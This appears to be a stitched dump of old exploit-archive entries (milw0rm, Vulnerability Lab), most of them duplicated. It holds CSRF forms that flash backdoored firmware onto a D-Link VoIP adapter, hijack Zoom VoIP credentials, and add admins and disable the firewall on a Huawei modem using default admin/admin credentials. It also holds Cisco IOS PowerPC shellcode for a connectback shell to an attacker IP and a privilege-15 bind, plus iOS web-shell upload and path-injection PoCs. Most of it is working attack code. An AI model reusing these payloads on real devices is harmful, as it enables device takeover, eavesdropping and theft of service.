Barracuda Spam Firewall (Firmware v3.5.12.001)
Alternatively, please contact Barracuda Networks for technical support.
Credits
Dr. Marian Ventuneac, marian.ventuneac@ul.ie
Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick
Disclaimer
Data Communication Security Laboratory releases this information with the vendor acceptance.
DCSL is not responsible for any malicious application of the information presented in this advisory.
# milw0rm.com [2008-12-16]

View file

@ -1,23 +1,23 @@
D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite)
model number: DVG-2001s
f/w version 1.00.007
Better than just remote code execution, you control the firmware.
<html>
<form action="http://10.1.1.166/Forms/cbi_Set_SW_Update?16640,0,0,0,0,0,0,0,0"
method="POST">
<input name="page_HiddenVar" value="0">
<input name="TFTPServerAddress1" value="10">
<input name="TFTPServerAddress2" value="1">
<input name="TFTPServerAddress3" value="1">
<input name="TFTPServerAddress4" value="1">
<input name="FirmwareUpdate" value="enabled">
<input name="FileName" value="backdoored_firmware.img">
<input type=submit value="attack">
</form>
</html>
and xss which can be used for csrf bypass:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E
# milw0rm.com [2009-01-29]
D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite)
model number: DVG-2001s
f/w version 1.00.007
Better than just remote code execution, you control the firmware.
<html>
<form action="http://10.1.1.166/Forms/cbi_Set_SW_Update?16640,0,0,0,0,0,0,0,0"
method="POST">
<input name="page_HiddenVar" value="0">
<input name="TFTPServerAddress1" value="10">
<input name="TFTPServerAddress2" value="1">
<input name="TFTPServerAddress3" value="1">
<input name="TFTPServerAddress4" value="1">
<input name="FirmwareUpdate" value="enabled">
<input name="FileName" value="backdoored_firmware.img">
<input type=submit value="attack">
</form>
</html>
and xss which can be used for csrf bypass:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E
# milw0rm.com [2009-01-29]

View file

@ -1,25 +1,25 @@
Written By Michael Brooks
Special thanks to str0ke!
Zoom VoIP Phone Adapater ATA1+1 XSRF
voip provider change xsrf
version 1.2.5
<html>
<form action="http://10.1.1.165/callwzd.html" method=post>
<input name=DIRTY_PAGE value=3>
<input name=HELP_PAGE value=html.html>
<input name=_voip_provider_1___provider_type value=1>
<input name=_voip_provider_1___provider_name value=hacked_again>
<input name=_voip_provider_1___display_name value=hacked_again>
<input name=_voip_provider_1___user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_password value=hacked_again>
<input name=ipbx_fxo_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_digit_leng value=6>
<input name=BUTTON_FLASH value="Save+These+Settings">
<input type=submit>
</form>
</html>
# milw0rm.com [2009-01-29]
Written By Michael Brooks
Special thanks to str0ke!
Zoom VoIP Phone Adapater ATA1+1 XSRF
voip provider change xsrf
version 1.2.5
<html>
<form action="http://10.1.1.165/callwzd.html" method=post>
<input name=DIRTY_PAGE value=3>
<input name=HELP_PAGE value=html.html>
<input name=_voip_provider_1___provider_type value=1>
<input name=_voip_provider_1___provider_name value=hacked_again>
<input name=_voip_provider_1___display_name value=hacked_again>
<input name=_voip_provider_1___user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_password value=hacked_again>
<input name=ipbx_fxo_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_digit_leng value=6>
<input name=BUTTON_FLASH value="Save+These+Settings">
<input type=submit>
</form>
</html>
# milw0rm.com [2009-01-29]

View file

@ -1,37 +1,37 @@
Description:
Huawei MT880 is a device offered by the algerian telecom operator -
FAWRI, to provide ADSL Internet connexion and it's already widely in use.
Overview:
Huawei MT880 firmware and its default configuration has flaws, which
allows LAN users to gain unauthorized full access to device.
Here are just limited PoCs.
Default credentials on the web-based management interface:
admin/admin
Possible XSRFs:
Adding an administrator user:
http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70
Disabling firewall/anti-DoS... features:
http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70
Adding a MAC address to the whitelist:
http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104
Adding an IP address allowed by the firewall:
http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7
Over flaws are not covered in this advisory.
Cheers
/JA
# milw0rm.com [2009-08-24]
Description:
Huawei MT880 is a device offered by the algerian telecom operator -
FAWRI, to provide ADSL Internet connexion and it's already widely in use.
Overview:
Huawei MT880 firmware and its default configuration has flaws, which
allows LAN users to gain unauthorized full access to device.
Here are just limited PoCs.
Default credentials on the web-based management interface:
admin/admin
Possible XSRFs:
Adding an administrator user:
http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70
Disabling firewall/anti-DoS... features:
http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70
Adding a MAC address to the whitelist:
http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104
Adding an IP address allowed by the firewall:
http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7
Over flaws are not covered in this advisory.
Cheers
/JA
# milw0rm.com [2009-08-24]

View file

@ -1,135 +1,135 @@
# ----------------------------------------------------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following five hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8
.equ addr, 0x803c4ad8
.equ str, 0x81e270b4
.equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------
main:
stwu 1,-48(1)
mflr 0
stw 31,44(1)
stw 0,52(1)
mr 31,1
li 3,512
lis 9,malloc@ha #malloc() memory for tcp structure
la 9,malloc@l(9)
mtctr 9
bctrl
mr 0,3
stw 0,20(31)
lwz 9,12(31)
li 0,1
stb 0,0(9)
lwz 9,12(31)
lis 0,0xac1e # connect back ip address
ori 0,0,1018 #
stw 0,4(9)
li 3,66
li 4,0
lis 9,allocate_tty@ha # allocate new TTY
la 9,allocate_tty@l(9)
mtctr 9
bctrl
addi 0,31,24
# Fix TTY structure to enable level 15 shell without password
#
#
##########################################################
# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end
#IDA placeholder for con0
#
# lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct
#
# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end
###########################################################
li 3,0
li 4,21 # Port 21 for connectback
lwz 5,12(31)
li 6,0
li 7,0
mr 8,0
li 9,0
lis 11,tcp_connect@ha # Connect to attacker IP
la 11,tcp_connect@l(11)
mtctr 11
bctrl
mr 0,3
stw 0,20(31)
li 3,66
lwz 4,20(31)
li 5,0
li 6,0
li 7,0
li 8,0
li 9,0
li 10,0
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
la 11,tcp_execute_command@l(11)
mtctr 11
bctrl
lwz 11,0(1)
lwz 0,4(11)
mtlr 0
lwz 31,-4(11)
mr 1,11
###########################################
lis 9, addr@ha
addi 0, 9, addr@l
mtctr 0
xor 3,3,3
addi 3,0, -2
lis 10, str@ha
addi 4, 10, str@l
bctrl
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl
# ----------------------------------------------------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following five hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8
.equ addr, 0x803c4ad8
.equ str, 0x81e270b4
.equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------
main:
stwu 1,-48(1)
mflr 0
stw 31,44(1)
stw 0,52(1)
mr 31,1
li 3,512
lis 9,malloc@ha #malloc() memory for tcp structure
la 9,malloc@l(9)
mtctr 9
bctrl
mr 0,3
stw 0,20(31)
lwz 9,12(31)
li 0,1
stb 0,0(9)
lwz 9,12(31)
lis 0,0xac1e # connect back ip address
ori 0,0,1018 #
stw 0,4(9)
li 3,66
li 4,0
lis 9,allocate_tty@ha # allocate new TTY
la 9,allocate_tty@l(9)
mtctr 9
bctrl
addi 0,31,24
# Fix TTY structure to enable level 15 shell without password
#
#
##########################################################
# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end
#IDA placeholder for con0
#
# lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct
#
# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end
###########################################################
li 3,0
li 4,21 # Port 21 for connectback
lwz 5,12(31)
li 6,0
li 7,0
mr 8,0
li 9,0
lis 11,tcp_connect@ha # Connect to attacker IP
la 11,tcp_connect@l(11)
mtctr 11
bctrl
mr 0,3
stw 0,20(31)
li 3,66
lwz 4,20(31)
li 5,0
li 6,0
li 7,0
li 8,0
li 9,0
li 10,0
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
la 11,tcp_execute_command@l(11)
mtctr 11
bctrl
lwz 11,0(1)
lwz 0,4(11)
mtlr 0
lwz 31,-4(11)
mr 1,11
###########################################
lis 9, addr@ha
addi 0, 9, addr@l
mtctr 0
xor 3,3,3
addi 3,0, -2
lis 10, str@ha
addi 4, 10, str@l
bctrl
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl
# milw0rm.com [2008-08-13]

View file

@ -1,65 +1,65 @@
# ----------------------------------------------------------------------------------------
#
# Cisco IOS Bind shellcode v1.0
# (c) 2007 IRM Plc
# By Varun Uppal
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new VTY, allocates a password then sets the privilege level to 15
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# Once assembled, the payload is only 116 bytes in length
#
# The following four hard-coded addresses must be located for the target IOS version.
# Version 1.1 of the shellcode will auto-locate these values and make the code
# IOS-version-independent
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ makenewvty, 0x803d0d08
.equ malloc, 0x804785cc
.equ setpwonline, 0x803b9e90
.equ linesstruct, 0x82f9e334
# ----------------------------------------------------------------------------------------
.equ priv, 0xf1000000 #value used to set the privilege level
main: li 3,71 #new vty line = 71
lis 9,makenewvty@ha
la 9,makenewvty@l(9)
mtctr 9
bctrl #makenewvty()
li 3,0x1e5c
lis 9,malloc@ha
la 9,malloc@l(9)
mtctr 9
bctrl #malloc() memory for structure
li 4,70
stw 4,0xa68(3)
li 5,72
stw 5,0xa6c(3)
li 4,0x00
bl setp #pointer to the password into LR
.string "1rmp455" #the password for the line
setp: mflr 5
lis 9,setpwonline@ha
la 9,setpwonline@l(9)
mtctr 9
bctrl #setpwonline()
lis 8,linesstruct@ha
la 8,linesstruct@l(8)
lwz 9,0(8)
lis 7,priv@ha
la 7,priv@l(7)
stw 7,0xde4(9) #set privilege level to 15
# ----------------------------------------------------------------------------------------
#
# Cisco IOS Bind shellcode v1.0
# (c) 2007 IRM Plc
# By Varun Uppal
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new VTY, allocates a password then sets the privilege level to 15
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# Once assembled, the payload is only 116 bytes in length
#
# The following four hard-coded addresses must be located for the target IOS version.
# Version 1.1 of the shellcode will auto-locate these values and make the code
# IOS-version-independent
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ makenewvty, 0x803d0d08
.equ malloc, 0x804785cc
.equ setpwonline, 0x803b9e90
.equ linesstruct, 0x82f9e334
# ----------------------------------------------------------------------------------------
.equ priv, 0xf1000000 #value used to set the privilege level
main: li 3,71 #new vty line = 71
lis 9,makenewvty@ha
la 9,makenewvty@l(9)
mtctr 9
bctrl #makenewvty()
li 3,0x1e5c
lis 9,malloc@ha
la 9,malloc@l(9)
mtctr 9
bctrl #malloc() memory for structure
li 4,70
stw 4,0xa68(3)
li 5,72
stw 5,0xa6c(3)
li 4,0x00
bl setp #pointer to the password into LR
.string "1rmp455" #the password for the line
setp: mflr 5
lis 9,setpwonline@ha
la 9,setpwonline@l(9)
mtctr 9
bctrl #setpwonline()
lis 8,linesstruct@ha
la 8,linesstruct@l(8)
lwz 9,0(8)
lis 7,priv@ha
la 7,priv@l(7)
stw 7,0xde4(9) #set privilege level to 15
# milw0rm.com [2008-08-13]

View file

@ -1,50 +1,50 @@
# ----------------------------------------------------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a password
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following two hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ ret, 0x804a42e8
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------
main:
# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end
# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end
# exit code
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl
# ----------------------------------------------------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a password
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following two hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ ret, 0x804a42e8
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------
main:
# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end
# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end
# exit code
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl
# milw0rm.com [2008-08-13]

View file

@ -0,0 +1,271 @@
Document Title:
===============
Imagam iFiles v1.16.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1160
Release Date:
=============
2013-12-03
Vulnerability Laboratory ID (VL-ID):
====================================
1160
Common Vulnerability Scoring System:
====================================
8.9
Product & Service Introduction:
===============================
iFiles is the most intuitive file manager for iOS with features like connectivity to many file cloud services,
transferring files between computer or cloud services, ability to view many file formats (PDF viewer now
supports annotations, search and more), voice recorder, web downloader, text file editor and more.
Supported Online Cloud Services and Protocols: Dropbox, Google Drive, iCloud, Box.net, SkyDrive, SugarSync, AFP
(Mac Shares), FTP/FTPS, SFTP, Flickr, Picasa, Facebook, Rackspace CloudFiles, CloudApp, PogoPlug, WebDav, Amazon
S3, Ubuntu One Files, ownCloud, 4Shared, also using Amazon S3: DreamObjects and UltiCloud.
( Copy of the Homepage: https://itunes.apple.com/de/app/ifiles/id336683524 & http://imagam.com )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Imagam
Product: iFiles - Mobile Application iOS 1.16.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A file include- & arbitrary file upload web vulnerability has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
An arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access.
A file include web vulnerability allows a remote attacker to unauthorized include local web-server file requests or external file requests.
The vulnerability is located in the vulnerable file- and folder-name value. Remote attackers can include local file requests combined with script code
to successful exploit the issue. To include to the vulnerable foldername value it is required to manipulate the `create folder` (add) input (POST Method).
The secound possibility to inject is the vulnerable filename value of the misconfigured (POST Method) upload module. After the include the remote attacker
can access the included file by requesting the regular index or sub category folder (web interface) site.
The arbitrary file upload vulnerability is located in the vulnerable filename value of the upload module. Attackers are also able to upload a php or js
web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with the following name and extension
test.jpg.html.js.php.gif.jpg . After the upload the attacker opens the file in the web application to delete the .gif.jpg file extension to access the
resource with elevated execution access rights.
Exploitation of the file include & arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename (value) - (multiple extensions)
[+] foldername
Affected Module(s):
[+] File & Folder Dir Listing (http://localhost:8080)
1.2
2 local command/path injection web vulnerabilities has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the device name value of the file dir und sub category listing module. Local attackers are able to inject
own malicious system specific commands or path values requests as the iOS device name. The execute of the injected script code occurs in two
different section with persistent attack vector. The first section is the wifi app web-interface index file/folder dir listing. The secound
execute occurs in the file/folder sub category listing. The security risk of the local command/path inject vulnerability is estimated as high(-)
with a cvss (common vulnerability scoring system) count of 6.2(+)|(-)6.3.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execute of system specific commands or unauthorized path requests.
Request Method(s):
[+] POST to GET
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
Proof of Concept (PoC):
=======================
1.1
The file include and arbitrary file upload web vulnerability can be exploited by remote attackers without privileged web application
user account and also without user interaction. For security demonstration or to reproduce the vulnerability follow the provided
information and steps below.
PoC: foldername
<div id="headerHighlight">
<div id="header">
<div class="logo">
<img src="_device%20folder&path-issue-1_files/icon57.png" alt="icon57" height="57" width="57">
<h1>iFiles</h1>
</div>
<div class="deviceName">
<h4>device bkm337? </h4>
</div>
<div class="urlDiv">
<div class="outer">
<div class="inner">
<b>/>"<[FILE INCLUDE WEB VULNERABILITY!]%22"_device%20folder&[FILE INCLUDE WEB VULNERABILITY!]%22">x.com/</b>
</div>
</div>
</div>
</div>
</div>
</div>
PoC: filename (value)
<tr id="sfile0" url="/" filename="<EMBED SRC=" data:image"="">
<td class="fileName">
<a href="http://192.168.2.106:8080/%3CEMBED%20SRC=" data:image"=""><img class="fileIcon"
src="_device%20folder&path-issue-2_files/FolderIcon.png" alt="*">
<embed src="data:image%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%09%3C/
a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%3C/td%3E%0A%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%3Ctd%20class=" filelastmod"="">Mon, 02 Dec 2013 15:50:10 GMT</a></td>
<td class="fileSize" align="right">--
<img style="display:none;" class="downloadIcon" src="_device%20folder&path-issue-2_files/downloadIcon.png"
alt="d" onclick="downloadFile('/<EMBED SRC=" data:image');"="">
<img class="deleteIcon" src="_device%20folder&path-issue-2_files/deleteIcon.png" alt="x"
title="Delete this file" onclick="deleteFile('#sfile0');" ="cursor:pointer;"="">
</td>
</tr>
<tr id="sfile1" url="/" filename="[FILE INCLUDE WEB VULNERABILITY!]%22">
<td class="fileName">
<a href="http://192.168.2.106:8080/%3E" <[FILE INCLUDE WEB VULNERABILITY!]%22"><img class="fileIcon"
src="_device%20folder&path-issue-2_files/FolderIcon.png" alt="*">
>"<[FILE INCLUDE WEB VULNERABILITY!]="_device%20folder&path-issue-2_files/a.htm" <="" a="">
</td>
1.2
The local command inject web vulnerability can be exploited by remote attackers with low privileged or restricted iOS device user account
and no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: devicename
<div id="headerHighlight">
<div id="header">
<div class="logo">
<img src="device%20name__files/icon57.png" alt="icon57" height="57" width="57">
<h1>iFiles</h1>
</div>
<div class="deviceName">
<h4>d4vice><..[COMMAND/PATH INJECT VULNERABILITY!] </h4>
</div>
<div class="urlDiv">
<div class="outer">
<div class="inner">
<b>/</b>
</div>
</div>
</div>
</div>
</div>
Solution - Fix & Patch:
=======================
1.1
The file include vulnerability and arbitrary file upload vulnerability can be patched by a secure parse and encode of the vulnerable
filename and foldername values.
Encode also the vulnerable path sub category file dir listing and the index file dir listing. Recognize the path value.
1.2
To patch the local command inject web vulnerability it is required to encode the deviename value in the index and sub category sites
to prevent injects or requests.
Security Risk:
==============
1.1
The security risk of the file include and arbitrary file upload (restricted upload bypass) web vulnerability is estimated as critical.
1.2
The security risk of the local command/path inject web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

View file

@ -0,0 +1,191 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
